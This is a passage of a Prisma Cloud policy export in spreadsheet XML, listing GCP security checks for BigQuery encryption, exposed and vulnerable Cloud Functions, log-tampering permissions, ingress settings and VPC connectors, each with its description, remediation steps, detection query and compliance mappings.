      <c r="U2675" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2675" t="inlineStr">
        <is>
          <t>gcloud-bigquery-table</t>
        </is>
      </c>
      <c r="W2675" t="inlineStr">
        <is>
          <t>This policy identifies GCP BigQuery tables that are not encrypted with Customer Managed Encryption Keys (CMEK).
CMEK for BigQuery tables provides control over the encryption of data at rest. Encrypting BigQuery tables with CMEK enhances security by giving you full control over encryption keys. This ensures data protection, especially for sensitive models and predictions. CMEK allows key rotation and revocation, aligning with compliance requirements and offering better data privacy management.
It is recommended to use CMEK for BigQuery table encryption.</t>
        </is>
      </c>
      <c r="X2675" t="inlineStr">
        <is>
          <t>To configure a Customer-managed encryption key (CMEK) for BigQuery Table, use following command for "bq" utility
bq cp -f --destination_kms_key &lt;CMEK&gt; &lt;DATASET_ID.TABLE_ID DATASET_ID.TABLE_ID&gt;
Please refer to URL mentioned below for more details on how to change table from default encryption to CMEK encryption:
https://cloud.google.com/bigquery/docs/customer-managed-encryption#change_to_kms
Please refer to URL mentioned below for more details on the bq update command:
https://cloud.google.com/bigquery/docs/reference/bq-cli-reference#bq_cp</t>
        </is>
      </c>
      <c r="Y2675" t="inlineStr"/>
      <c r="Z2675" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-bigquery-table' AND json.rule = encryptionConfiguration.kmsKeyName does not exist</t>
        </is>
      </c>
      <c r="AA2675" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2675" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2675" t="inlineStr">
        <is>
          <t>PC-GCP-BGQ-1317</t>
        </is>
      </c>
      <c r="AD2675" t="b">
        <v>1</v>
      </c>
      <c r="AE2675" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2675" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG267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75" t="inlineStr">
        <is>
          <t>b4da93e8-6362-45c4-bd72-ed9021c193de</t>
        </is>
      </c>
      <c r="AI2675" t="inlineStr">
        <is>
          <t>3a79c786-3999-4bac-b004-c527e42a840d</t>
        </is>
      </c>
      <c r="AJ2675" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2675" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2676">
      <c r="A2676" t="inlineStr">
        <is>
          <t>PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B2676" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2676" s="2" t="inlineStr"/>
      <c r="D2676" t="inlineStr"/>
      <c r="E2676" t="inlineStr"/>
      <c r="F2676" t="inlineStr"/>
      <c r="G2676" t="b">
        <v>0</v>
      </c>
      <c r="H26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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2676" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2676" t="inlineStr">
        <is>
          <t>gklimeck_chubb_test</t>
        </is>
      </c>
      <c r="L2676" t="inlineStr"/>
      <c r="M2676" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2676" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2676" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2676" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2676" t="inlineStr">
        <is>
          <t>Requirement 2</t>
        </is>
      </c>
      <c r="R2676" t="inlineStr">
        <is>
          <t>2.2.1</t>
        </is>
      </c>
      <c r="S2676" t="inlineStr"/>
      <c r="T2676" t="b">
        <v>0</v>
      </c>
      <c r="U2676" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2676" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2676" t="inlineStr">
        <is>
          <t>gklimeck_chubb_test</t>
        </is>
      </c>
      <c r="X2676" t="inlineStr"/>
      <c r="Y2676" t="inlineStr"/>
      <c r="Z2676" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-cloud-function' AND json.rule = status equals ACTIVE and iamPolicy.bindings[?any(members[*] is member of ("allAuthenticatedUsers","allUsers"))] exists</t>
        </is>
      </c>
      <c r="AA2676" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2676" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2676" t="inlineStr"/>
      <c r="AD2676" t="b">
        <v>0</v>
      </c>
      <c r="AE2676" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2676" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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6" t="inlineStr">
        <is>
          <t>dc91a67b-8327-4b7f-a172-51adbb7cd569</t>
        </is>
      </c>
      <c r="AI2676" t="inlineStr">
        <is>
          <t>9d657a8a-6c31-4bb5-8bb8-d0d55d04263b</t>
        </is>
      </c>
      <c r="AJ2676" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2676" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2677">
      <c r="A2677" t="inlineStr"/>
      <c r="B2677" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2677" s="2" t="inlineStr"/>
      <c r="D2677" t="inlineStr"/>
      <c r="E2677" t="inlineStr"/>
      <c r="F2677" t="inlineStr"/>
      <c r="G2677" t="b">
        <v>1</v>
      </c>
      <c r="H26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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2677" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2677" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable GCP Cloud Function [Apache, CVE-2022-42889]</t>
        </is>
      </c>
      <c r="L2677" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2677" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2677" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2677" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2677" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2677" t="inlineStr"/>
      <c r="R2677" t="inlineStr"/>
      <c r="S2677" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2677" t="b">
        <v>0</v>
      </c>
      <c r="U2677" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2677" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2677" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that are publicly exposed and have known exploitable remote code execution vulnerability [Apache, CVE-2022-42889].
Remote code execution vulnerability is a critical security flaw allowing unauthorized users to execute arbitrary code on a system, potentially leading to data breaches, system compromise, or unauthorized data manipulation. The fact that the GCP Cloud Function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Apache [CVE-2022-42889] vulnerability and public exposure reported for the GCP Cloud Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2677"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2677" t="inlineStr"/>
      <c r="Z2677" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('gcloud-cloud-function') and finding.name contains all ('GCP Cloud Function is publicly accessible') AND with : (Vuln WHERE id IN ('CVE-2022-42889'))</t>
        </is>
      </c>
      <c r="AA2677" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2677" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:05</t>
        </is>
      </c>
      <c r="AC2677" t="inlineStr"/>
      <c r="AD2677" t="b">
        <v>1</v>
      </c>
      <c r="AE2677" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2677" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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7" t="inlineStr">
        <is>
          <t>70ecbda6-054e-40b3-a3ce-60c305c0ac1c</t>
        </is>
      </c>
      <c r="AI2677" t="inlineStr">
        <is>
          <t>5098fbdb-f47e-4fc6-aea3-3a7817fc6a1b</t>
        </is>
      </c>
      <c r="AJ2677" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2677" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2678">
      <c r="A2678" t="inlineStr"/>
      <c r="B2678" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2678" s="2" t="inlineStr"/>
      <c r="D2678" t="inlineStr"/>
      <c r="E2678" t="inlineStr"/>
      <c r="F2678" t="inlineStr"/>
      <c r="G2678" t="b">
        <v>1</v>
      </c>
      <c r="H26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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2678" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2678" t="inlineStr">
        <is>
          <t>Denial of Service (DoS) risk due to publicly exposed and vulnerable GCP Cloud Function [Python, CVE-2021-20270]</t>
        </is>
      </c>
      <c r="L2678" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2678" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2678" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2678" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2678" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2678" t="inlineStr"/>
      <c r="R2678" t="inlineStr"/>
      <c r="S2678" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2678" t="b">
        <v>0</v>
      </c>
      <c r="U2678" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2678" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2678" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions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GCP Cloud Function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Python [CVE-2021-20270] vulnerability and public exposure reported for the GCP Cloud Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2678"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2678" t="inlineStr"/>
      <c r="Z2678" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('gcloud-cloud-function') and finding.name contains all ('GCP Cloud Function is publicly accessible') AND with : (Vuln WHERE id IN ('CVE-2021-20270'))</t>
        </is>
      </c>
      <c r="AA2678" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2678" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:52</t>
        </is>
      </c>
      <c r="AC2678" t="inlineStr"/>
      <c r="AD2678" t="b">
        <v>1</v>
      </c>
      <c r="AE2678" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2678" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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8" t="inlineStr">
        <is>
          <t>84b90dc8-f268-40cd-8e34-e53db1d20afd</t>
        </is>
      </c>
      <c r="AI2678" t="inlineStr">
        <is>
          <t>01e0271e-0233-462d-a562-d8170b1eb37f</t>
        </is>
      </c>
      <c r="AJ2678" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2678" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2679">
      <c r="A2679" t="inlineStr"/>
      <c r="B2679" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2679" s="2" t="inlineStr"/>
      <c r="D2679" t="inlineStr"/>
      <c r="E2679" t="inlineStr"/>
      <c r="F2679" t="inlineStr"/>
      <c r="G2679" t="b">
        <v>1</v>
      </c>
      <c r="H26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79" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2679" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2679" t="inlineStr">
        <is>
          <t>CRLF Injection risk due to publicly exposed and vulnerable GCP Cloud Function [Python, CVE-2020-26137]</t>
        </is>
      </c>
      <c r="L2679" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2679" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2679" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2679" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2679" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2679" t="inlineStr"/>
      <c r="R2679" t="inlineStr"/>
      <c r="S2679" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2679" t="b">
        <v>0</v>
      </c>
      <c r="U2679" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2679" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2679" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that are publicly exposed and have known exploitable CRLF injection vulnerability [Python, CVE-2020-26137].
CRLF injection vulnerability is a security flaw allowing an attacker to inject a CRLF sequence. The fact that the GCP Cloud Function is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Python [CVE-2020-26137] vulnerability and public exposure reported for the GCP Cloud Function as soon as possible.</t>
        </is>
      </c>
      <c r="X2679"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2679" t="inlineStr"/>
      <c r="Z2679" t="inlineStr">
        <is>
          <t>asset where asset.type IN ('gcloud-cloud-function') and finding.name contains all ('GCP Cloud Function is publicly accessible') AND with : (Vuln WHERE id IN ('CVE-2020-26137'))</t>
        </is>
      </c>
      <c r="AA2679" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2679" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:51</t>
        </is>
      </c>
      <c r="AC2679" t="inlineStr"/>
      <c r="AD2679" t="b">
        <v>1</v>
      </c>
      <c r="AE2679" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2679" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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79" t="inlineStr">
        <is>
          <t>74805ac4-7906-4e14-9159-1c9b772a1320</t>
        </is>
      </c>
      <c r="AI2679" t="inlineStr">
        <is>
          <t>25455a20-c4b6-4950-9ac1-9579be005fd5</t>
        </is>
      </c>
      <c r="AJ2679" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2679" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2680">
      <c r="A2680" t="inlineStr"/>
      <c r="B2680" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2680" s="2" t="inlineStr"/>
      <c r="D2680" t="inlineStr"/>
      <c r="E2680" t="inlineStr"/>
      <c r="F2680" t="inlineStr"/>
      <c r="G2680" t="b">
        <v>1</v>
      </c>
      <c r="H26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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2680" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2680" t="inlineStr">
        <is>
          <t>Cloud Log tampering risk due to a publicly exposed and vulnerable GCP Cloud Function with permissions to disrupt logging</t>
        </is>
      </c>
      <c r="L2680" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2680" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2680" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2680" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2680" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2680" t="inlineStr"/>
      <c r="R2680" t="inlineStr"/>
      <c r="S2680" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2680" t="b">
        <v>0</v>
      </c>
      <c r="U2680" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2680" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2680" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that are publicly exposed with critical or high vulnerabilities with permissions to disrupt logging.
Publicly exposed vulnerable Cloud Functions could allow malicious actors to remotely exploit the vulnerability to get initial access to the resource. Cloud Functions with permission to disrupt logging could further expand the surface of the attack and grant unauthorized access to delete or modify log metrics, sinks, and buckets containing project logs through which the attacker can erase his trail.
This policy checks for the following permissions:
logging.logMetrics.delete', 'logging.logMetrics.update', 'logging.buckets.delete', 'logging.buckets.update', 'logging.logs.delete', 'logging.sinks.delete', 'logging.sinks.update'
Immediate attention is required to review role assignments and grant only the least privileges required. Remediate critical and high vulnerabilities, and restrict public exposure reported for the Cloud Functions as soon as possible.</t>
        </is>
      </c>
      <c r="X2680"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[PERMISSION]
Remediation steps:
1. Log in to the GCP console
2. Navigate to the Cloud Function
3. Navigate to the IAM service
4. Find the binding between the service account used by the function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80" t="inlineStr"/>
      <c r="Z2680" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-cloud-function') and finding.name contains all ('GCP Cloud Function is publicly accessible','GCP Cloud Function with permissions to disrupt logging') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2680" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2680" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2680" t="inlineStr"/>
      <c r="AD2680" t="b">
        <v>1</v>
      </c>
      <c r="AE2680" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2680" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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0" t="inlineStr">
        <is>
          <t>c9035e0b-dbea-488b-b7f4-95fdcfcc639c</t>
        </is>
      </c>
      <c r="AI2680" t="inlineStr">
        <is>
          <t>4ef36f6f-89d5-4702-a417-1a2b00e8dcc6</t>
        </is>
      </c>
      <c r="AJ2680" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2680" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2681">
      <c r="A2681" t="inlineStr"/>
      <c r="B2681" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2681" s="2" t="inlineStr"/>
      <c r="D2681" t="inlineStr"/>
      <c r="E2681" t="inlineStr"/>
      <c r="F2681" t="inlineStr"/>
      <c r="G2681" t="b">
        <v>1</v>
      </c>
      <c r="H26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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2681" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2681" t="inlineStr">
        <is>
          <t>Unauthorized access risk due to publicly exposed, overly permissive ingress and vulnerable GCP Cloud Function</t>
        </is>
      </c>
      <c r="L2681" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2681" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2681" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2681" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2681" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2681" t="inlineStr"/>
      <c r="R2681" t="inlineStr"/>
      <c r="S2681" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2681" t="b">
        <v>0</v>
      </c>
      <c r="U2681" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2681" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2681" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions which are publicly exposed with overly permissive ingress and have critical or high vulnerabilities.
Attackers can exploit these vulnerabilities to compromise the confidentiality, integrity, and availability of the affected Cloud Functions, enabling them to perform malicious actions. With an overly permissive Ingress setting, all inbound requests to the function are allowed from both public and private resources. The public exposure of these vulnerable Cloud Functions with overly permissive ingress makes them easy targets for attacks.
Immediate attention is required to remediate the critical and high vulnerabilities, restrict public exposure, and make ingress settings restrictive for the reported function as soon as possible.</t>
        </is>
      </c>
      <c r="X2681"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[MISCONFIGURATION]
1. Login to GCP console
2. Navigate to 'Cloud Functions' service (Left Panel)
3. Click on the alerting function
4. Click on 'EDIT'
5. Click on 'Runtime, build, connections and security settings' drop-down to get the detailed view
6. Click on the 'CONNECTIONS' tab
7. In 'Ingress settings', select either 'Allow internal traffic only' or 'Allow internal traffic and traffic from Cloud Load Balancing'
8. Click on 'NEXT'
9. Click on 'DEPLOY'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81" t="inlineStr"/>
      <c r="Z2681" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-cloud-function') and finding.name contains all ('GCP Cloud Function is publicly accessible','GCP Cloud Function configured with overly permissive Ingress setting') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2681" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2681" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:23</t>
        </is>
      </c>
      <c r="AC2681" t="inlineStr"/>
      <c r="AD2681" t="b">
        <v>1</v>
      </c>
      <c r="AE2681" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2681" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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1" t="inlineStr">
        <is>
          <t>49dc4eec-8be1-417d-8e89-77bd0a7a1d3e</t>
        </is>
      </c>
      <c r="AI2681" t="inlineStr">
        <is>
          <t>99d19e8e-9d5f-48c8-bf2c-cc0b3ea89b67</t>
        </is>
      </c>
      <c r="AJ2681" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2681" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2682">
      <c r="A2682" t="inlineStr">
        <is>
          <t>RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, New Zealand Information Security Manual (NZISM v3.4), Secure Controls Framework (SCF) - 2024.2, ACSC Information Security Manual (ISM), CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, Telecommunications Security Act - TSA, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, Insurance Regulatory And Development Authority Of India, kashan ACSC Information Security Manual (ISM), NIST 800-53 Rev 5, Copy of ACSC Information Security Manual (ISM)-clone, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), kfirdaus AWS Account-CS, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, ACSC Information Security Manual (ISM), CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), CIS Controls v7.1, Copy of New Zealand Information Security Manual (NZISM v3.4)</t>
        </is>
      </c>
      <c r="B2682" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2682" s="2" t="inlineStr"/>
      <c r="D2682" t="inlineStr"/>
      <c r="E2682" t="inlineStr"/>
      <c r="F2682" t="inlineStr"/>
      <c r="G2682" t="b">
        <v>0</v>
      </c>
      <c r="H26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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2682" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="K2682" t="inlineStr">
        <is>
          <t>GCP Cloud Function not enabled with VPC connector</t>
        </is>
      </c>
      <c r="L2682" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2682" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2682" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2682" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2682" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2682" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2682" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2682" t="inlineStr"/>
      <c r="T2682" t="b">
        <v>0</v>
      </c>
      <c r="U2682" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2682" t="inlineStr">
        <is>
          <t>gcloud-cloud-function</t>
        </is>
      </c>
      <c r="W2682" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud Functions that are not configured with a VPC connector. VPC connector helps function to connect to a resource inside a VPC in the same project. Setting up the VPC connector allows you to set up a secure perimeter to guard against data exfiltration and prevent functions from accidentally sending any data to unwanted destinations. It is recommended to configure the GCP Cloud Function with a VPC connector.
Note: For the Cloud Functions function to access the public traffic with Serverless VPC connector, you have to introduce Cloud NAT.
Link: https://cloud.google.com/functions/docs/networking/network-settings#route-egress-to-vpc</t>
        </is>
      </c>
      <c r="X2682" t="inlineStr">
        <is>
          <t>1. Login to GCP console
2. Navigate to 'Cloud Functions' service (Left Panel)
3. Click on the alerting function
4. Click on 'EDIT'
5. Click on 'Runtime, build, connections and security settings’ drop-down to get the detailed view
6. Click on the 'CONNECTIONS' tab
7. Under Section 'Egress settings', select a VPC connector from the dropdown
8. In case VPC connector is not available, select 'Custom' and
9. Click on 'Create a Serverless VPC Connector', follow the link to create a Serverless VPC connector: https://cloud.google.com/vpc/docs/configure-serverless-vpc-access
10. Once the Serverless VPC connector is available, select it from the dropdown
11. Click on 'NEXT'
12. Click on 'DEPLOY'</t>
        </is>
      </c>
      <c r="Y2682" t="inlineStr"/>
      <c r="Z2682" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-cloud-function' AND json.rule = status equals ACTIVE and vpcConnector does not exist</t>
        </is>
      </c>
      <c r="AA2682" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2682" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2682" t="inlineStr">
        <is>
          <t>PC-GCP-FUN-775</t>
        </is>
      </c>
      <c r="AD2682" t="b">
        <v>1</v>
      </c>
      <c r="AE2682" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2682" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG26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2" t="inlineStr">
        <is>
          <t>9b78ca0d-75dc-480c-9b86-41330a881acb</t>
        </is>
      </c>
      <c r="AI2682" t="inlineStr">
        <is>
          <t>940f7491-eb9a-4471-b05b-329cd99d72ef</t>
        </is>
      </c>
      <c r="AJ2682" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2682" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2683">
      <c r="A2683" t="inlineStr">
        <is>
          <t>HIPAA, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, HITRUST CSF v.11.2.0, ITSG-33, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, TX-RAMP Level 1, Telecommunications Security Act - TSA, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, SOC 2, NYDFS 23 CRR-NY 500.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, SOC 2, Secure Controls Framework (SCF) - 2024.2, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2022.2.1, ITSG-33, TX-RAMP Level 2, ISO/IEC 27001:2022, NIST 800-53 Rev 5, HIPAA, HIPAA</t>
        </is>
      </c>
      <c r="B2683" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2683" s="2" t="inlineStr"/>
      <c r="D2683" t="inlineStr"/>
      <c r="E2683" t="inlineStr"/>
      <c r="F2683" t="inlineStr"/>
      <c r="G2683" t="b">
        <v>1</v>
      </c>
      <c r="H26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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
